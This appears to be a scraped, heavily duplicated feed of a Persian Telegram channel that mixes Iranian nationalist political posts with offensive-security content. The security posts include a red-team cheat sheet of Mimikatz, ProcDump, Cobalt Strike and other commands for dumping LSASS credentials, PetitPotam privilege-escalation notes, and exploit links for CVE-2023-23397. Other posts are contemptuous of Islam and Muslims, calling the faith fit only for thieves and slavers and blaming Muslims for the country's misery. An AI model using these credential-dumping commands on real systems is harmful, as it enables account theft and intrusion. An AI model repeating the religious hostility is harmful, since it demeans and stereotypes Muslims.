دموکراتیک؛ کدواژه حکومتهای کمونیستی و مجاهدین خلق !
هرجا عبارت « دموکراتیک » را دیدید فقط میتوانم بگویم #فرار کنید ! این واژه برخلاف ظاهر زیبایش، در نام هر کشوری بکار رفته، جز بدبختی و ویرانی چیزی برای آن نداشته است ! بیش از ۱۰بار عبارت کثیف و منحوس دموکراتیک در متن منشور بکار رفته است
جمهوری دموکراتیک شکلی از حکومت است که بر اساس اصول اتخاذ شده از یک #جمهوری و یک #دموکراسی عمل میکند
پس از جنگ جهانی دوم بسیاری از کشورها در نام خود از عبارت «جمهوری دموکراتیک» استفاده کردند که تقریبا همهی آنها دولتهای تک حزبی مارکسیست-لنینیست یا سوسیالیست بودند که اجازه فعالیت سیاسی به مخالفان نمیدادند و مطبوعات آزاد وجود نداشت و هیچ اثری از آزادی واقعی در آن نبود
🔺جمهوری دموکراتیک آلمان (آلمان شرقی) جمهوری دموکراتیک سومالی، جمهوری دموکراتیک ویتنام (ویتنام شمالی)، جمهوری دموکراتیک خلق یمن (یمن جنوبی)..امروزه نیز؛ جمهوری دموکراتیک کنگو، اتیوپی، کره شمالی، لائوس، نپال و...
نمونه بارز این کشورها؛ جمهوری دموکراتیک کنگو است ! خودتان درباره آن تحقیق کنید
الان هم مجاهدین خلق با کلمه دموکراتیک ارضا شده است
@pfksecurity
هرجا عبارت « دموکراتیک » را دیدید فقط میتوانم بگویم #فرار کنید ! این واژه برخلاف ظاهر زیبایش، در نام هر کشوری بکار رفته، جز بدبختی و ویرانی چیزی برای آن نداشته است ! بیش از ۱۰بار عبارت کثیف و منحوس دموکراتیک در متن منشور بکار رفته است
جمهوری دموکراتیک شکلی از حکومت است که بر اساس اصول اتخاذ شده از یک #جمهوری و یک #دموکراسی عمل میکند
پس از جنگ جهانی دوم بسیاری از کشورها در نام خود از عبارت «جمهوری دموکراتیک» استفاده کردند که تقریبا همهی آنها دولتهای تک حزبی مارکسیست-لنینیست یا سوسیالیست بودند که اجازه فعالیت سیاسی به مخالفان نمیدادند و مطبوعات آزاد وجود نداشت و هیچ اثری از آزادی واقعی در آن نبود
🔺جمهوری دموکراتیک آلمان (آلمان شرقی) جمهوری دموکراتیک سومالی، جمهوری دموکراتیک ویتنام (ویتنام شمالی)، جمهوری دموکراتیک خلق یمن (یمن جنوبی)..امروزه نیز؛ جمهوری دموکراتیک کنگو، اتیوپی، کره شمالی، لائوس، نپال و...
نمونه بارز این کشورها؛ جمهوری دموکراتیک کنگو است ! خودتان درباره آن تحقیق کنید
الان هم مجاهدین خلق با کلمه دموکراتیک ارضا شده است
@pfksecurity
برای من تنها چیزی که مهم است ایران و فرهنگ ایران است و بس!
هر کس این سه مورد را نداشته باشد ایرانی نیست ، درسته تو ایران به دنیا آمده ولی نه خودش نه خانوادش ایرانی نیستند و تازی زاده اند .
شما اگر قوم یهود به ایران حمله میکرد بدون شک الان یهودی بودید ! اینقدر پست و احمق هستید که اصلا فکر نمیکنید اون سربازی که به دست اعراب کشته شد برای ایندگان و ناموسش به جنگ رفت بعد چسبیدی به اعراب !
دین اسلام فقط باب پسند دزدان و غارتگران و برده داران و شهوت رانان هستش چیزی برای انسانیت ندارد .
باعث بانی بدبختیای الان کشور هم زیر سر شما مسلمانان است .
#نه_به_اسلام
@pfksecurity
هر کس این سه مورد را نداشته باشد ایرانی نیست ، درسته تو ایران به دنیا آمده ولی نه خودش نه خانوادش ایرانی نیستند و تازی زاده اند .
شما اگر قوم یهود به ایران حمله میکرد بدون شک الان یهودی بودید ! اینقدر پست و احمق هستید که اصلا فکر نمیکنید اون سربازی که به دست اعراب کشته شد برای ایندگان و ناموسش به جنگ رفت بعد چسبیدی به اعراب !
دین اسلام فقط باب پسند دزدان و غارتگران و برده داران و شهوت رانان هستش چیزی برای انسانیت ندارد .
باعث بانی بدبختیای الان کشور هم زیر سر شما مسلمانان است .
#نه_به_اسلام
@pfksecurity
Telegram
P.F.K Security
سه پایه استوار ملیت ایرانی، بدون شک زرتشت، کوروش و فردوسی هستند.
زرتشت اندیشهی نیک را بنیاد نهاد و کوروش آن را به کردار نیک تبدیل کرد و فردوسی آن را با گفتار نیک بیان نمود.
@PFKSecurity
زرتشت اندیشهی نیک را بنیاد نهاد و کوروش آن را به کردار نیک تبدیل کرد و فردوسی آن را با گفتار نیک بیان نمود.
@PFKSecurity
باج افزار IceFire بازگشت | اکنون شبکه های سازمانی لینوکس را هدف قرار می دهیم
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
#Ransomware
@PfkSecurity
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
#Ransomware
@PfkSecurity
SentinelOne
IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
New Linux version of the IceFire ransomware have been observed in recent network intrusions of media and entertainment enterprises.
🔥 آیین باستانی #چهارشنبه_سوری را به ملت ایران (و نه آنها که ایران و فرهنگش برایشان ارزشی ندارد از سرخ تا سیاه تا قبیله گرا) شادباش عرض می کنم.🔥
ای #آذر(آتش) اهورامزدا،🔥
آن هیزمی که بشاید تو را باد، آن اندوختهای که بشاید تو را باد، برنایی به نگاهبانی تو گماشته باد، دین آگاهی به نگاهبانی تو گماشته باد، تا تو هماره در این خانمان فروزان باشی🔥
✍️📗 #اوستا 🔥
پاس دارم آتش🔥 جاوید را
یادگار منش جمشید را
چند روزى مانده بودش تا به عید
آمد آتش🔥 در چنین روزى پدید
بهر او آتشگهى آراستند
از پلیدى و سیاهى کاستند
پس از آن هر روز در روزى چنین
جشن سورى بوده در ایرانزمین
تا که آتش🔥 را پرستارى کنیم
از اهورا طلب یارى کنیم.
- نور برتاریکی پیروز است .
🔥 چهارشنبه سوری تان شاد باد 🔥
#چهارشنبه_سوری
@PfkSecurity
ای #آذر(آتش) اهورامزدا،🔥
آن هیزمی که بشاید تو را باد، آن اندوختهای که بشاید تو را باد، برنایی به نگاهبانی تو گماشته باد، دین آگاهی به نگاهبانی تو گماشته باد، تا تو هماره در این خانمان فروزان باشی🔥
✍️📗 #اوستا 🔥
پاس دارم آتش🔥 جاوید را
یادگار منش جمشید را
چند روزى مانده بودش تا به عید
آمد آتش🔥 در چنین روزى پدید
بهر او آتشگهى آراستند
از پلیدى و سیاهى کاستند
پس از آن هر روز در روزى چنین
جشن سورى بوده در ایرانزمین
تا که آتش🔥 را پرستارى کنیم
از اهورا طلب یارى کنیم.
- نور برتاریکی پیروز است .
🔥 چهارشنبه سوری تان شاد باد 🔥
#چهارشنبه_سوری
@PfkSecurity
احتمالاً بسیاری از شما راه های مختلفی برای dump پروسس Lsass در ویندوز می دانید. ممکن است کسی بیش از پنج راه را بداند، اما باور کنید راه های بسیار بیشتری وجود دارد.
#0x01 > Mimikatz
Methods:
#0x02 > ProcDump
Methods:
#0x03 > Process Hacker
Methods:
#0x04 > DumpIt
Methods:
#0x05 > Windows Debugging Tools
Methods:
ادامه دارد ...
#Lsass #redteam
@PfkSecurity
#0x01 > Mimikatz
Methods:
Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync#0x02 > ProcDump
Methods:
procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp#0x03 > Process Hacker
Methods:
System->LSASS process->Create Dump#0x04 > DumpIt
Methods:
tasklist /FI “IMAGENAME eq lsass.exe” DumpIt.exe PID output_file_name.bin#0x05 > Windows Debugging Tools
Methods:
windbg -p .dump /ma c:\path\to\lsass.dmp .detach .qادامه دارد ...
#Lsass #redteam
@PfkSecurity
به این ترتیب می توانید به راحتی توکن Access را از طریق Wildcard Origin در postMessage بدزدید.
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#windows #privesc #rpc #petitpotam
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
long EfsRpcOpenFileRaw( [in] handle_t binding_h, [out] PEXIMPORT_CONTEXT_HANDLE* hContext, [in, string] wchar_t* FileName, [in] long Flags );چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity
This media is not supported in your browser
VIEW IN TELEGRAM
چگامه(شعر) : #ببر_مازندران .
✍سروده ی : #موبد_سوشیانت_مزدیسنا .
شنو غرش ببر مازندران
که لرزید دشمن کران تا کران
خروش سپهبد رضا میر پنج
ز خشم و ز کین و ز اندوه و رنج
که میهن به دام و به داغ قجر
تو گفتی برفتی به عصر حجر
فرومایه آن کوچک جنگلی
دگر شیخ آن خز عل انگلی
به دندان گرفتند ایران چو گرگ
چه غافل ز شاه، ببر بزرگ
یکایک بکرد سینه ی دیو، چاک
رضاشاه آن مرد بی ترس و باک
نیاسود یک دم ز سازندگی
ببخشود کشور ز نو زندگی
چو بودش نژاد یلان و کیان
بشد پهلوی بر زبان و بیان
۲۴ اسپند زاد روز #رضا_شاه بزرگ و اشو #زرتشت(به گزارش پهلوی موبد بزرگ زادسپَرم) فرخنده باد.
رضا شاه روانت شاد
@pfksecurity
✍سروده ی : #موبد_سوشیانت_مزدیسنا .
شنو غرش ببر مازندران
که لرزید دشمن کران تا کران
خروش سپهبد رضا میر پنج
ز خشم و ز کین و ز اندوه و رنج
که میهن به دام و به داغ قجر
تو گفتی برفتی به عصر حجر
فرومایه آن کوچک جنگلی
دگر شیخ آن خز عل انگلی
به دندان گرفتند ایران چو گرگ
چه غافل ز شاه، ببر بزرگ
یکایک بکرد سینه ی دیو، چاک
رضاشاه آن مرد بی ترس و باک
نیاسود یک دم ز سازندگی
ببخشود کشور ز نو زندگی
چو بودش نژاد یلان و کیان
بشد پهلوی بر زبان و بیان
۲۴ اسپند زاد روز #رضا_شاه بزرگ و اشو #زرتشت(به گزارش پهلوی موبد بزرگ زادسپَرم) فرخنده باد.
رضا شاه روانت شاد
@pfksecurity
CVE-2023-23415 ICMP RCE
مایکروسافت در بیانیه ای اعلام کرد: یک مهاجم می تواند از راه دور از این آسیب پذیری با استفاده از یک خطای پروتکل سطح پایین حاوی یک بسته IP تکه تکه شده در هدر که به ماشین هدف ارسال می شود، سوء استفاده کند.
این آسیب پذیری محصولات زیر مایکروسافت را تحت تأثیر قرار می دهد:
Windows Server 2008@(-∞، 14 مارس 2023)
Windows Server 2012@(-∞، 14 مارس 2023)
Windows Server 2016@(-∞، 14 مارس 2023)
Windows 10@(-∞، 14 مارس 2023)
Windows 11@(-∞، 14 مارس 2023)
Windows Server 2022@(-∞، 14 مارس 2023)
Windows Server 2019@(-∞، 14 مارس 2023)
هنوز POC وجود ندارد
#CVE
@PfkSecurity
مایکروسافت در بیانیه ای اعلام کرد: یک مهاجم می تواند از راه دور از این آسیب پذیری با استفاده از یک خطای پروتکل سطح پایین حاوی یک بسته IP تکه تکه شده در هدر که به ماشین هدف ارسال می شود، سوء استفاده کند.
این آسیب پذیری محصولات زیر مایکروسافت را تحت تأثیر قرار می دهد:
Windows Server 2008@(-∞، 14 مارس 2023)
Windows Server 2012@(-∞، 14 مارس 2023)
Windows Server 2016@(-∞، 14 مارس 2023)
Windows 10@(-∞، 14 مارس 2023)
Windows 11@(-∞، 14 مارس 2023)
Windows Server 2022@(-∞، 14 مارس 2023)
Windows Server 2019@(-∞، 14 مارس 2023)
هنوز POC وجود ندارد
#CVE
@PfkSecurity
P.F.K Security
احتمالاً بسیاری از شما راه های مختلفی برای dump پروسس Lsass در ویندوز می دانید. ممکن است کسی بیش از پنج راه را بداند، اما باور کنید راه های بسیار بیشتری وجود دارد. #0x01 > Mimikatz Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync #0x02…
#0x06 > FTK Imager
Methods:
#0x07 > Volatility
Methods:
#0x08 > WinPmem
Methods:
#0x09 > hiberfil.sys
Methods:
#0x10 > Windows Error Reporting
Methods:
#0x11 > LiveKd
Methods:
#0x12 > Task Manager
Methods:
#0x13 > Cobalt Strike+SharpDump
Methods:
#0x14 > Cobalt Strike+mimikatz_command
Methods:
#0x15 > Cobalt Strike+taskkill
Methods:
#Lsass
@PfkSecurity
Methods:
Create Disk Image Physical Drive Capture Memory LSASS.exe#0x07 > Volatility
Methods:
Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D#0x08 > WinPmem
Methods:
winpmem.exe -o dump.raw#0x09 > hiberfil.sys
Methods:
windbg.exe -y srvc:\symbolshttps://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma #0x10 > Windows Error Reporting
Methods:
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe#0x11 > LiveKd
Methods:
LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]#0x12 > Task Manager
Methods:
Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=#0x13 > Cobalt Strike+SharpDump
Methods:
Execute-assembly SharpDump Or load sharpdumpsharpdump#0x14 > Cobalt Strike+mimikatz_command
Methods:
Mimikatz_command sekurlsa::minidump#0x15 > Cobalt Strike+taskkill
Methods:
taskkill /f /im lsass.exe#Lsass
@PfkSecurity
CVE-2023-23397
Microsoft Office Outlook
حاوی یک آسیبپذیری افزایش دسترسی است که به یک حمله NTLM Relay علیه سرویس دیگری اجازه میدهد تا به عنوان کاربر احراز هویت شود.
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
#CVE #Privesc
@PfkSecurity
Microsoft Office Outlook
حاوی یک آسیبپذیری افزایش دسترسی است که به یک حمله NTLM Relay علیه سرویس دیگری اجازه میدهد تا به عنوان کاربر احراز هویت شود.
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
#CVE #Privesc
@PfkSecurity
GitHub
GitHub - sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY: Exploit for the CVE-2023-23397
Exploit for the CVE-2023-23397. Contribute to sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY development by creating an account on GitHub.
💠 کمی عقب بایستید. یک لیوان آب بخورید. نفس عمیق بکشید و صحنه رو ببینید.
جمهوری اسلامی توانست با بازی تجزیهطلبی، که بیشتر یک فوبیای ذهنیه و نه خطر واقعی روی زمین، مانع از شکلگیری همگرایی همهی نیروها بر ضد خودش بشه. بد بازی خوردیم دوستان.
گاهی استفاده از هوش، بد نیست.
@PfkSecurity
جمهوری اسلامی توانست با بازی تجزیهطلبی، که بیشتر یک فوبیای ذهنیه و نه خطر واقعی روی زمین، مانع از شکلگیری همگرایی همهی نیروها بر ضد خودش بشه. بد بازی خوردیم دوستان.
گاهی استفاده از هوش، بد نیست.
@PfkSecurity
💠 قشری از براندازان قراره تا یک ماه با بمباران رسانه ای سرخوش و مدهوش باشن و گمان کنن اپوزوسیونی به صورت طوفانی پیش میره و مسیر سقوط رو هموار می کنه..
رسانه هایی نظیر ایران اینترنشنال و من و تو و.. با انواع و اقسام تیتر های مسرت بخش، جو رو هیجانی خواهند کرد و کنش هایی با استدلال منطقی و چاره اندیشی تخصصی جای خودشون رو به کنش های سطحی و سانتیمانتال خواهند داد..
با عرض معذرت؛ یک الی دو ماه دیگر با سیل "چسناله" و "ناامیدی" از سوی این عزیزان رو به رو خواهیم شد..
یک الی دو ماه دیگر به این پست بازمیگردیم..
"زمان بهترین قاضی و آموزگار است"
@pfksecurity
رسانه هایی نظیر ایران اینترنشنال و من و تو و.. با انواع و اقسام تیتر های مسرت بخش، جو رو هیجانی خواهند کرد و کنش هایی با استدلال منطقی و چاره اندیشی تخصصی جای خودشون رو به کنش های سطحی و سانتیمانتال خواهند داد..
با عرض معذرت؛ یک الی دو ماه دیگر با سیل "چسناله" و "ناامیدی" از سوی این عزیزان رو به رو خواهیم شد..
یک الی دو ماه دیگر به این پست بازمیگردیم..
"زمان بهترین قاضی و آموزگار است"
@pfksecurity